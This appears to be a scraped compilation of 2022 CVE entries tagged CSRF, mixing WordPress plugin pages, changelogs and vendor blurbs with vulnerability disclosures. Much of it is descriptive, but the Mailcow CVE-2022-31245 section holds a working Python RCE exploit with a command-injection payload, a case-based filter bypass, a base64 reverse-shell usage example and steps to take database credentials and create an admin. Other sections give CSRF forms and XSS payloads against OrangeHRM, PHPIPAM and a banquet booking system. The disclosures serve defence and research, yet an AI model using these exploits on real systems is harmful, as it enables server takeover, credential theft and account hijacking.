Cross-Site Request Forgery (CSRF) vulnerability in KubiQ CPT base plugin <= 5.8 at WordPress allows an attacker to delete the CPT base.

*   Details
*   Reviews
*   Installation
*   Support
*   Development

Remove custom post type base slug from url

*   possibility to select specific custom post type(s)
*   auto redirect old slugs to no-base slugs

1.  Upload remove-cpt-base directory to the /wp-content/plugins/ directory
2.  Activate the plugin through the ‘Plugins’ menu in WordPress

I easily removed the services slug from the link

Very simple plugin, but works perfectly! 🎉

A simple but efficient plugin that works like charm... 🙂

couldnt get the slug remove done with custom code on one particular site for whatever reason ... but this little thing works flawlessly! thanks - please keep it up!! 🙂

Read all 18 reviews

“Remove CPT base” is open source software. The following people have contributed to this plugin.

Contributors

*    kubiq

**5.9**

*   added nonce and security checks

**5.8**

*   tested on WP 5.9

**5.7**

*   tested on WP 5.5
*   minor fix

**5.6**

*   tested again with WPML, Polylang and Custom Post Type Permalinks and fixed

**5.5**

*   tested on WP 5.5
*   another fix for Custom Post Type Permalinks plugin

**5.4**

*   enable previews for CPTs without base

**5.3**

*   make it works with WPML
*   make it works with Polylang
*   make it works with Custom Post Type Permalinks plugin

**5.2**

*   tested on WP 5.4

**5.1**

*   removed auto-prevent slug duplicates
*   removed debug mode
*   removed remove\_cpt\_base\_skip filter
*   use default WP function instead of custom
*   make it works for custom rewrite slugs
*   prioritize page and post like WP does

**5.0**

*   YOU HAVE TO SAVE YOUR SETTINGS AGAIN, because:
*   added alternation option for each post type separately
*   added debug mode

**4.8**

*   fix alternative CPT children solving for nested children

**4.7**

*   alternative CPT children solving

**4.6**

*   fix server port redirect

**4.5**

*   make it works for WP installations in directory

**4.4**

*   minor changes

**4.3**

*   fix for some endpoints and make sure post is not interpreted as attachment

**4.2**

*   fix for hierarchical CPTs on some servers

**4.1**

*   make it works for posts interpreted like category by WP

**4.0**

*   tested on WP 5.2
*   make it works for hierarchical post types and different permalink structures
*   going back to ‘pre\_get\_posts’
*   optimize generating slug for duplicate names

**3.3**

*   change HTTP code from 404 to 200

**3.2**

*   fix for query strings

**3.1**

*   add custom endpoint rewrites support

**3.0**

*   stop using complicated ‘pre\_get\_posts’ and handle 404 instead

**2.3**

*   tested on WP 5.0

**2.2**

*   fix 404

**2.1**

*   fix redirect loop in WPML and WooCommerce

**2.0**

*   stop using .htaccess rules

**1.2**

*   auto init after permalinks updated

**1.1**

*   add uninstall hook
*   add duplicate slug check
*   minor updates

**1.0**

*   First version

CVE-2022-29431: Remove CPT base

Cross-Site Scripting (XSS) vulnerability in KubiQ's PNG to JPG plugin <= 4.0 at WordPress via Cross-Site Request Forgery (CSRF). Vulnerable parameter &jpg_quality.

*   Details
*   Reviews
*   Installation
*   Support
*   Development

Convert PNG images to JPG, free up web space and speed up your webpage

*   set quality of converted JPG
*   auto convert on upload
*   auto convert on upload only when PNG has no transparency
*   only convert image if JPG filesize is lower than PNG filesize
*   leave original PNG images on the server
*   convert existing PNG image to JPG
*   bulk convert existing PNG images to JPG
*   conversion statistics

1.  Upload png-to-jpg directory to the /wp-content/plugins/ directory
2.  Activate the plugin through the ‘Plugins’ menu in WordPress

Best work, fast speed when png convert to jpg

I had a client site where the developers used ALL PNG IMAGES and it was SLOW. Thank you for this awesome plugin you saved me a ton of time not having to convert manually & re-upload via GIMP!

Easy to use and efficient. The bulk convert page loads fast, the images were generated and replaced neatly. I saved over 80MB converting approximately 350 PNGs, and this was only a test run. Lovely plugin!

The plugin converts the format and replaces the address in the database well and without any problems. Be sure to back up before use to avoid problems

I used it on WordPress 5.7.1. The plugin does what it should do. Converting 200 images took about 3 minutes. I hope it will be updated soon. Using old plugins is always a bit scary.

Плагин нашел лишь малую часть моих PNG. Затем заменил полноразмерные png на jpg при этом они все исчезли из тех записей где стояли. Также (!) уменьшенные варианты этих же изображений ОН ОСТАВИЛ В ТОМ ЖЕ ФОРМАТЕ PNG. Таким образом были убиты самые большие PNG и больше ничего не изменилось. Я это делал птому что у меня есть backup сайта 🙂

Read all 32 reviews

“PNG to JPG” is open source software. The following people have contributed to this plugin.

Contributors

*    kubiq

**4.1**

*   added nonce and security checks
*   added button to stop transparency detection or conversion process
*   removed DB prefix from notice table names to make it more readable
*   remove preview box flex centering to make it works with bigger images
*   auto delete PNG backup when JPG deleted in admin

**4.0**

*   replace images also in post\_excerpt
*   separate SQL queries
*   added support for FV Player plugin

**3.9.1**

*   tested on WP 5.9
*   check if file really exists and if has .png extension

**3.9**

*   fix transparency default state

**3.8**

*   tested on WP 5.4
*   save transparency meta and load it instantly next time
*   image viewer – background switch
*   image viewer – centered image
*   image viewer – highlight image borders and show image size on hover

**3.7**

*   do not run second transparency detection if first one return true

**3.6**

*   metadata update fix

**3.5**

*   added support for Broken Link Checker plugin ( blc\_instances, blc\_links )

**3.4**

*   replace image url also in these database tables: yoast\_seo\_links, revslider\_static\_slides

**3.3**

*   tested on WP 5.2
*   handle duplicate names like WP – adding increment
*   optimizing code for faster processing

**3.2**

*   added support for Fancy Product Designer plugin

**3.1**

*   tested on WP 5.0
*   small cosmetic code changes

**3.0**

*   new option: convert only if JPG will have lower filesize then PNG
*   new feature: show converted images statistics
*   fix: conflict when there is already JPEG with a same name as PNG
*   fix: conflict when PNG name is part of another PNG name ( eg. ‘xyz.png’ can rename also ‘abcxyz.png’ )
*   optimized for translations

**2.6**

*   rename PNG image if JPG with the same name already exists

**2.5**

*   BUG FIXED – disabled checkboxes when autodetect is disabled

**2.4**

*   now you can disable autodetect PNG transparency

**2.3**

*   WP 4.9.1 compatibility check
*   new compatibility with Toolset Types

**2.2**

*   Repair revslider database table detection

**2.1**

*   Added option to leave original PNG image on server after conversion
*   Repair SQL replacement query

**2.0**

*   Replace image and thumbnails extension in database tables
*   Moved from Settings to Tools submenu
*   Some small fixes

**1.2**

*   Fix generating background for transparent images (thanks @darkcobalt)

**1.1**

*   Fix PNG transparency detection

**1.0**

*   First version

CVE-2022-29430: PNG to JPG

Cross-Site Request Forgery (CSRF) vulnerability in Aftab Muni's Disable Right Click For WP plugin <= 1.1.6 at WordPress.

**disable-right-click-for-wp**

**Software**

**Disable Right Click For WP**

**Vulnerable Versions**

**<= 1.1.6**

**Fixed in version**

**CVE**

**CVE-2022-29427**

**References**

**Credits**

**Classification**

**Cross Site Request Forgery (CSRF)**

**OWASP Top 10**

**A5: Broken Access Control**

**Disclosure Date**

**2022-05-04**

**CVSS 3.0 score**

**Are your websites subject to this vulnerability?**

**Details**

**Cross-Site Request Forgery (CSRF) vulnerability discovered by Rasi Afeef (Patchstack Alliance) in WordPress Disable Right Click For WP plugin (versions <= 1.1.6).**

**Solution**

**No patched version is available. No reply from the vendor.**

**Found a vulnerability that puts your sites at risk?**

**Found a vulnerability? Help us secure the web and join our community of ethical hackers.**

**Are you the developer of this software? Hire our researchers for a thorough security audit.**

CVE-2022-29427: WordPress Disable Right Click For WP plugin <= 1.1.6 - Cross-Site Request Forgery (CSRF) vulnerability - Patchstack

Authenticated (admin or higher user role) Stored Cross-Site Scripting (XSS) vulnerability in ibericode's MC4WP plugin <= 4.8.6 at WordPress.

CVE-2021-36833: MC4WP: Mailchimp for WordPress

GoCD is a continuous delivery server. GoCD versions 19.11.0 through 21.4.0 (inclusive) are vulnerable to a Document Object Model (DOM)-based cross-site scripting attack via a pipeline run's Stage Details > Graphs tab. It is possible for a malicious script on a attacker-hosted site to execute script that will run within the user's browser context and GoCD session via abuse of a messaging channel used for communication between with the parent page and the stage details graph's iframe. This could allow an attacker to steal a GoCD user's session cookies and/or execute malicious code in the user's context. This issue is fixed in GoCD 22.1.0. There are currently no known workarounds.

CVE-2022-29182: Releases - Version notes | GoCD

mailcow before 2022-05d allows a remote authenticated user to inject OS commands and escalate privileges to domain admin via the --debug option in conjunction with the ---PIPEMESS option in Sync Jobs.

**Mailcow CVE-2022-31245**

CVE-2022-31245: RCE and Domain Admin privilege escalation for Mailcow. Including POC.  

Patched Version: https://github.com/mailcow/mailcow-dockerized/releases/tag/2022-05d  
CVE: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-31245

**CVE-2022-31245: Command Injection, RCE**

Severity: 3/3  
Type: Command Injection, RCE, Domain Takeover  
Affected versions: least 2019 - 2022-05c  

A flaw exists in all recent Mailcow versions where a regular user of the system can exploit the “Sync Job” feature to gain a shell using a command injection in imapsync. Using this vunerability a attacker can then easily pivot to the database and escalate privileges to the role of “Domain Admin” in Mailcow.

This exploit includes persistence by default since Sync Jobs run on a timer.

This exploit compromises the entire Mailcow instance. Tested and working on release as of 2022-05c. Patched in 2022-05d.

**Technical overview**

Using the steps below the vulnerability can be recreated.

Gaining shell:

1.  Go to the Mailcow login page (not SOGo)
2.  Login as a regular user
3.  Go to Sync Jobs
4.  Set the following values: hostname=MAILCOW_IP, Port=IMAP_PORT, Username=CURRENT_USER, Password=CURRENT_PASS, Encryption=PLAIN, Interval=1, Active=Check, Custom Parameters=--debug --nosslcheck --PIPEMESS=CMD Where the field "Custom Parameters" is the important field. CMD can be a arbitrary shell command without spaces. Using uppercase is important!
5.  Press save and wait 1 min for the command to execute.

Custom Parameters example payload:

    --debug --nosslcheck --PIPEMESS=touch${IFS}test.txt
    

CMD cannot contain space,quotes or slashes use ${IFS} instead of space. Uppercase for --PIPEMESS is important to bypass check in functions.mailbox.inc.php at line 340:

if (strpos($custom\_params, 'pipemess')) {
	$custom\_params = '';
}

This uppercase command still works due to the fact that imapsync is case insensitive.

Privilege Escalation:

1.  After gaining shell on the dovcot container run env
2.  Find DBUSER and DBPASS
3.  Login to database using mysql and credentials
4.  Create new admin user or create a new admin API-key

**Proof-of-Concept, POC**

Automated POC. POC could in some cases need modification to run against non-local Mailcow instances.

#!/bin/python3

description \= """
Mailcow authenticated RCE. Only for educational purposes!!
By: ly1g3\[at\]tuta.io
This exploit can be used to get mailcow domain admin using mysql credentials found in "env" after getting shell.
Quotes, spaces and slash cant be used in cmd. Use ${IFS} as space. End command with ; is recommended.
Example reverse shell use: --cmd 'echo${IFS}PYTHON\_REVERSE\_SHELL\_BASE64${IFS}|${IFS}base64${IFS}-d${IFS}|${IFS}sh;' where PYTHON\_REVERSE\_SHELL\_BASE64 is python reverse shell.
Example usage: ./mailcow\_poc1.py --url https://192.168.1.2 --user test@local.com --passwd testpass --cmd 'echo${IFS}PYTHON\_REVERSE\_SHELL\_BASE64${IFS}|${IFS}base64${IFS}-d${IFS}|${IFS}sh;'
"""

import requests
import urllib
import sys
from urllib.parse import urlparse
import argparse
from argparse import RawTextHelpFormatter
from datetime import datetime

parser \= argparse.ArgumentParser(description\=description, formatter\_class\=RawTextHelpFormatter)
parser.add\_argument('--url', help\='Url to the mailcow server', required\=True)
parser.add\_argument('--user', help\='Mailcow username, example test@mailcow.com', required\=True)
parser.add\_argument('--passwd', help\='Mailcow user password', required\=True)
parser.add\_argument('--cmd', help\='Command to execute', required\=True)

args \= parser.parse\_args()

base\_url \= args.url
\# hostname = urlparse(base\_url).netloc
hostname \= '127.0.0.1'
user \= args.user
password \= args.passwd
cmd \= args.cmd

\# Get the required csrf token
def find\_csrf\_token(text):
    try:
        start1 \= text.index("var csrf\_token")
        start2 \= text.index("'", start1)
        end2 \= text.index("'", start2+1)
        csrf\_token \= text\[start2+1:end2\]
        return csrf\_token
    except:
        return ""

login\_url \= base\_url + '/'

s \= requests.Session()

\# Login
r1 \= s.post(login\_url, data\={'login\_user': user, 'pass\_user': password}, verify\=False)

token \= find\_csrf\_token(r1.text)
if not token:
    print("Error no token found, login problems?")
    sys.exit(0)
print(f"CSRF token: {token}")

sync\_url \= base\_url + '/api/v1/add/syncjob'

\# Create sync job with command injection
attr \= f'{{"host1":"{hostname}","port1":"143","user1":"{user}","password1":"{password}","enc1":"PLAIN","mins\_interval":"1","subfolder2":"","maxage":"0","maxbytespersecond":"0","timeout1":"10","timeout2":"10","exclude":"(?i)spam|(?i)junk","custom\_params":"--debug --nosslcheck --PIPEMESS={cmd}","subscribeall":"1","active":"1","csrf\_token":"{token}"}}'
r2 \= s.post(sync\_url, data\={'attr': attr, 'csrf\_token': token}, verify\=False)

c \= r2.content
if c.find(b"mailbox\_modified") != \-1:
    print("Success, rule modified")
elif c.find(b"object\_exists") != \-1:
    print("ERROR: Object exists, remove existing rule before running this")
    print(c)
    sys.exit(0)
else:
    print("ERROR: Something went wrong")
    print(c)
now \= datetime.now()
current\_time \= now.strftime("%H:%M:%S")
print("Command may take 1min to execute...")
print(f"Done at: {current\_time}")

CVE-2022-31245: GitHub - ly1g3/Mailcow-CVE-2022-31245: CVE-2022-31245: RCE and domain admin privilege escalation for Mailcow

A Cross-Site Request Forgery (CSRF) in Online Banquet Booking System v1.0 allows attackers to change admin credentials via a crafted POST request.

# Exploit Title: Online Banquet Booking System - 'change admin credentials' Cross-Site Request Forgery (CSRF)# Date: 04/04/2022# Exploit Author: Saud Alenazi# Vendor Homepage: https://phpgurukul.com# Software Link: https://phpgurukul.com/online-banquet-booking-system-using-php-and-mysql/# Version: 1.0# Tested on: XAMPP, Linux# Contact: https://twitter.com/dmaral3noz# Description :The application is not using any security token to prevent it against CSRF. Therefore, malicious user can change admin credentials by using crafted post request.# HTTPS Request :POST /obbs/admin/admin-profile.php HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedContent-Length: 86Origin: http://localhostConnection: closeReferer: http://localhost/obbs/admin/admin-profile.phpCookie: PHPSESSID=5lotcnigq4mddq3rr6tnnlvn3eUpgrade-Insecure-Requests: 1adminname=Admin&username=admin&email=admin%40gmail.com&mobilenumber=5689784589&submit=# Poc Html :<html>    <body>  <script>history.pushState('', '', '/')</script>    <form action="http://localhost/obbs/admin/admin-profile.php" method="POST">      <input type="hidden" name="adminname" value="Admin" />      <input type="hidden" name="username" value="admin" />      <input type="hidden" name="email" value="admin@gmail.com" />      <input type="hidden" name="mobilenumber" value="123" />      <input type="hidden" name="submit" value="" />      <input type="submit" value="Submit request" />    </form>  </body></html>

CVE-2022-28992: Online Banquet Booking System 1.0 Cross Site Request Forgery ≈ Packet Storm

A stored cross-site scripting (XSS) vulnerability in the addNewPost component of OrangeHRM v4.10.1 allows attackers to execute arbitrary web scripts or HTML via a crafted POST request.

**Environment details**  
OrangeHRM version: 4.10.1  
OrangeHRM source: Release build from Sourceforge or Git clone  
Platform: Ubuntu  
PHP version: 7.3.33  
Database and version: MariaDB 10.3  
Web server: Apache 2.4.52

If applicable:  
Browser: Firefox

**Describe the bug**  
Insufficient input validation in Buzz - addNewPost API results in Stored Cross Site Scripting attack. An attacker - who is an authenticated user - can craft a malicious request causing malicious Javascript to execute in the browser of any other user. The malicious Javascript can trigger when a victim user visits the Buzz page.

**To Reproduce**

1.  Authenticate to the user dashboard.
2.  Visit 'Buzz' page
3.  Collect the CSRF token from the HTML response. It can be found in an 'input' field with the id createPost__csrf_token. Example :

    <input type="hidden" name="createPost[_csrf_token]" value="8d7f3ee80979a1360fb445a6ffa1ffec" id="createPost__csrf_token">
    

4.  Collect the logged in user cookie _orangehrm
5.  Fire the following POST request including the CSRF token and cookie obtained. Replace the Host header too :

    POST /symfony/web/index.php/buzz/addNewPost HTTP/1.1
    Host: 1.2.3.44
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    Content-Length: 173
    Origin: http://54.165.4.147
    Connection: close
    Cookie: Loggedin=True; _orangehrm=qod7ejr1fqjtvtnm27i62ltcrb
    
    createPost%5Bcontent%5D=content&createPost%5BlinkAddress%5D=javascript:alert(1221)&createPost%5BlinkTitle%5D=xss&createPost%5BlinkText%5D=&createPost%5B_csrf_token%5D=cb38d12166e154ded1869000c43c1ea5
    

6.  Click on the link 'xss' in the most recent post.

**Expected behavior**  
The value of parameters createPost[linkTitle] and createPost[linkAddress] should be validated by API and an error should be thrown.

**What do you see instead:**  
The malicious payload gets submitted successfully and get's stored in the posting made by the user.

**Screenshots**

  

**Technical Details**  
A logged in user can post status updates to their buzz feed. From the front-end application a user will be able to post a text within a single field which says "What's on your mind" to the buzz feed. This happens via a POST request to the URL /symfony/web/index.php/buzz/addNewPost through the createPost[content] request body parameter. While investigating this API, we found that there are extra parameter fields in the body of this API which is not directly exposed through the frontend application.

The following request body parameters found in the API results certain profound effects in the HTML response sent by server:

1.  createPost[linkAddress]
    
    Causes the addition of an <a> anchor tag in response with id linkTitle & with attribute src with the value set for createPost[linkAddress] parameter.
    
2.  createPost[linkTitle]
    
    Causes an <a> anchor tag in response with id linkTitle which is click able and displayed with the text content sent in the above request parameter.
    

Combining the above 2 parameters, it's possible to get an anchor HTML tag with a visible clickable text and a desired URL as src which is clickable.

The URL payload could be javascript as javascript:alert(121). This can result in execution of arbitrary malicious javascript code on the client side if the victim clicks on this link.  
The impact of this can be severe since this particular code gets stored in the database and gets delivered to the feed of every logged-in user in orangeHRM. Every user will have this delivered through their 'Buzz' feed.

In terms of impact, this vulnerability enables an attacker to stealing CSRF token and perform arbitrary actions on the website on behalf of the victim user.

CVE-2022-28985: Stored XSS in "Update Status" section under "OrangeBuzz" via the GET/POST parameters `createPost[linkTitle]` and `createPost[linkAddress]` · Issue #1217 · orangehrm/orangehrm

PHPIPAM version 1.4.4 suffers from cross site request forgery and cross site scripting vulnerabilities.

=====[ Tempest Security Intelligence - ADV-03/2022  
]==========================

PHPIPAM - Version 1.4.4

Author: Rodolfo Tavares

Tempest Security Intelligence - Recife, Pernambuco - Brazil

=====[ Table of Contents ]==================================================

* Overview  
* Detailed description  
* Timeline of disclosure  
* Thanks & Acknowledgements  
* References

=====[ Vulnerability Information  
]=============================================

* Class: Improper Neutralization of Input During Web Page Generation  
('Cross-Site Scripting') [CWE-79]  
* CVSS: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:L

* Class: Cross-Site Request Forgery (CSRF) [CWE-352]  
* CVSS: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:L

=====[ Overview ]========================================================

 * System affected: PHPIPAM - Version 1.4.4  
 * Software Version: Version 1.4.4 (other versions may also be affected).  
 * Impact: PHPIPAM 1.4.4 is vulnerable to Cross-Site Request Forgery (CSRF)  
and Cross-Site Scripting (XSS) via  
app/admin/subnets/find_free_section_subnets.php. An attacker can exploit  
this by injecting javascript code to coerce an admin user into performing  
unintended actions.

=====[ Detailed description  
]=================================================

The html codes below exploit vulnerabilities in the same way due to the  
fact that both forms do not contain CSRF tokens and are vulnerable to XSS  
attacks. Then an attacker can host the forms on their malicious host and  
trick an administrator into visiting your page. If successful, the  
javascript code will execute.

* [app/admin/subnets/find_free_section_subnets.php]

<html>  
  <body>  
    <h1> Exploit PHPIPAM </h1>  
  <script>history.pushState('', '', '/')</script>  
    <form action="  
http://127.0.0.1:8082/app/admin/subnets/find_free_section_subnets.php"  
method="POST">  
      <input type="hidden" name="container" value="body" />  
      <input type="hidden" name="placement" value="top" />  
      <input type="hidden" name="sectionid" value="2'><input  
onpointerleave="alert(1)">rodnt</input><script>alert('incogbyte')</script>"  
/>  
      <input type="hidden" name="original-title" value="Search for free  
subnets in section " />  
      <input type="submit" value="Exploit" />  
    </form>  
  </body>  
</html>

=====[ Timeline of disclosure  
]===============================================

13/Jan/2022 - Responsible disclosure was initiated with the vendor;

14/Jan/2022 - PHPIPAM confirmed the issues;

17/Jan/2022 - The vendor fixed the issues XSS and CSRF;

24/Mar/2022 - CVE reserved as CVE-2021-46426;

25/Mar/2022 - CVE assigned [5].

=====[ Thanks & Acknowledgements ]========================================

* Tempest Security Intelligence [4]

=====[ References ]=====================================================

[1] [  
https://cwe.mitre.org/data/definitions/352.html|https://cwe.mitre.org/data/definitions/352.html  
]

[2] [  
https://cwe.mitre.org/data/definitions/79.html|https://cwe.mitre.org/data/definitions/79.html  
]

[3] [  
https://github.com/phpipam/phpipam/commit/6c1f72816d6ac634e9c174057e008717d959f351|https://github.com/phpipam/phpipam/commit/6c1f72816d6ac634e9c174057e008717d959f351  
]

[4] [https://www.tempest.com.br|https://www.tempest.com.br/]

[5] [  
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-46426|https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-46426  
]

[6][ Thanks to Celso (CGB) =)]

=====[ EOF ]===========================================================

--

PHPIPAM 1.4.4 Cross Site Request Forgery / Cross Site Scripting

A Cross-Site Request Forgery (CSRF) vulnerability discovered in BlogEngine.Net v3.3.8.0 allows unauthenticated attackers to read arbitrary files on the hosting web server.

BlogEngine is an open source blogging platform since 2007. Easily customizable.  
Many free built-in Themes, Widgets, and Plugins.

Get Started Online Demo

BlogEngine.NET Version 3.3.8

**BlogEngine Pro Themes**

70% OFF

We packed all of the Pro BlogEngine themes for you with a huge discount. This is the best deal ever.

We packed 5 of the best BlogEngine themes for you with a huge discount.

The Biz theme is a great theme for personal and business blogs. It's clean and modern. On the home page, you have a sidebar widget zone, Also a great slideshow.

**We match your BlogEngine to your website deisgn.**

Tag

#csrf